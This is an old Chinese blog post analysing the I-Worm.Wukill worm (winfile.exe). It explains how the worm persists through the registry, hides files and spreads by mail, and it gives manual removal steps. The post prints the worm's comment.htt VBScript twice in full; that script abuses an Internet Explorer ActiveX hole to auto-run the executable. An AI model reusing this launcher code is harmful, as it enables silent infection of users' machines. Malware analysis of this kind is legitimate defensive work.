WinFile.exe病毒原理及解决方法
2005-04-16 14:49
489 查看
[winfile.exe]
[病毒名]:I-Worm.Wukill
[破坏方法]:这个病毒采用文件夹图标,具有很大迷惑性。该病毒运行后,会将自己大量复制到其他目录中。
一、 病毒首次运行时将显示This File Has Been Damage!;
二、 将自己复制到windows目录下并改名为Mstray.exe;
三、修改注册表:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
以达到其自启动的目的;
四、 枚举磁盘目录,在每个根目录下释放下列文件:
winfile.exe 病毒主体程序
comment.htt 利用IE漏洞调用同一个目录下的winfile.exe,属性为隐藏。
desktop.ini 系统为隐藏。采用web方式浏览文件夹时,系统会调用该文件,该文件调
用comment.htt ,从而激活病毒。
五、 病毒修改注册表,隐藏系统文件、隐藏受系统保护的文件、隐藏已知的扩展名称。
这样,用户看不到comment.htt和Desktop.ini, winfile.exe被隐藏后缀明,又是文件
夹图标,用户极容易认为是文件夹而点击。
同时病毒在当前路径下生成的自身拷贝,名称采用上级目录,或者是当前窗口的标题,
增加隐蔽性。
六、病毒调用发送携带病毒的信件。
手工清除:(在没有杀毒软件的情况下)
首先:找到Mstray.exe(注意这个是系统
和隐藏的文件,所以大家应该知道怎
么才能找到它了,在系统文件夹下),
删除掉.
并修改注册表,去掉对应的启动项.
接着:利用的Windows的搜索功能,搜索所
有的:
Winfile.exe,comment.htt,
desktop.ini(注意:查看->去掉系
统保护,去掉隐藏)
删除!注意还得清楚不要删错了哦!
有些desktop.ini是windows原有
的文件)
最后:查找硬盘内所以的[*.exe]文件,
(注意:如上),你会发现好多的文件夹
图标形式的.exe 文件,删除掉所有
这些文件.一切OK!
comment.htt 源代码
<body><html>
<body >
<script language=vbscript>
document.write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><APPLET NAME=LHW HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET></div>"
</script>
<script language=vbscript>
On Error Resume Next
Dim we,path,win
we = ""
Path = ""
win=""
Path = Left(document.location, Len(document.location) - 11)
Path = Mid(Path, 9)
Set AppleObject = document.applets("lhw")
AppleObject.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
AppleObject.createInstance()
Set WsShell = AppleObject.GetObject()
Wsshell.run(Path + "WINFILE.EXE")
</script>
</body>
</html>
</body>
[病毒名]:I-Worm.Wukill
[破坏方法]:这个病毒采用文件夹图标,具有很大迷惑性。该病毒运行后,会将自己大量复制到其他目录中。
一、 病毒首次运行时将显示This File Has Been Damage!;
二、 将自己复制到windows目录下并改名为Mstray.exe;
三、修改注册表:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
以达到其自启动的目的;
四、 枚举磁盘目录,在每个根目录下释放下列文件:
winfile.exe 病毒主体程序
comment.htt 利用IE漏洞调用同一个目录下的winfile.exe,属性为隐藏。
desktop.ini 系统为隐藏。采用web方式浏览文件夹时,系统会调用该文件,该文件调
用comment.htt ,从而激活病毒。
五、 病毒修改注册表,隐藏系统文件、隐藏受系统保护的文件、隐藏已知的扩展名称。
这样,用户看不到comment.htt和Desktop.ini, winfile.exe被隐藏后缀明,又是文件
夹图标,用户极容易认为是文件夹而点击。
同时病毒在当前路径下生成的自身拷贝,名称采用上级目录,或者是当前窗口的标题,
增加隐蔽性。
六、病毒调用发送携带病毒的信件。
手工清除:(在没有杀毒软件的情况下)
首先:找到Mstray.exe(注意这个是系统
和隐藏的文件,所以大家应该知道怎
么才能找到它了,在系统文件夹下),
删除掉.
并修改注册表,去掉对应的启动项.
接着:利用的Windows的搜索功能,搜索所
有的:
Winfile.exe,comment.htt,
desktop.ini(注意:查看->去掉系
统保护,去掉隐藏)
删除!注意还得清楚不要删错了哦!
有些desktop.ini是windows原有
的文件)
最后:查找硬盘内所以的[*.exe]文件,
(注意:如上),你会发现好多的文件夹
图标形式的.exe 文件,删除掉所有
这些文件.一切OK!
comment.htt 源代码
<body><html>
<body >
<script language=vbscript>
document.write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><APPLET NAME=LHW HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET></div>"
</script>
<script language=vbscript>
On Error Resume Next
Dim we,path,win
we = ""
Path = ""
win=""
Path = Left(document.location, Len(document.location) - 11)
Path = Mid(Path, 9)
Set AppleObject = document.applets("lhw")
AppleObject.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
AppleObject.createInstance()
Set WsShell = AppleObject.GetObject()
Wsshell.run(Path + "WINFILE.EXE")
</script>
</body>
</html>
</body>
相关文章推荐
- 关于winlogo.exe中了“落雪”病毒的解决方法
- Sunny.exe病毒的解决方法
- 关于winasse.exe生成Win59.exe等病毒的解决方法
- D盘双击打不开完美解决方法。。lsass.exe病毒木马病毒症状及手工清除方法修正版
- EXPLORER.EXE病毒手动解决方法
- lsass.exe病毒的解决方法
- "RavMonE.exe"病毒的解决方法
- explorer.exe经常出错的解决方法和原因
- exe文件打不开的解决方法
- 【转】JS跨域(ajax跨域、iframe跨域)解决方法及原理详解(jsonp)
- [转]发生 LC.exe 已经退出 代码-1 错误的解决方法
- 运行VS2013编译成功后出现:无法启动程序“.exe” 系统找不到指定文件的问题的解决方法
- 提示“dwwin.exe DLL 初始化失败”错误对话框的解决方法
- Tomcat中文乱码问题的原理和解决方法
- HEAP[xxx.exe]:Invalid Address specified to RtlValidateHeap 错误的解决方法总结
- hashmap冲突的解决方法以及原理分析
- 64位Win7环境下,C#无法打开osk.exe解决方法
- MsMpEng.exe进程引起网速缓慢的解决方法
- mt.exe : general error c101008d 解决方法
- IIS设置允许下载.exe文件的解决方法(转自:http://hi.baidu.com/greenyork/blog/item/81da2a001d2175091d958319.html)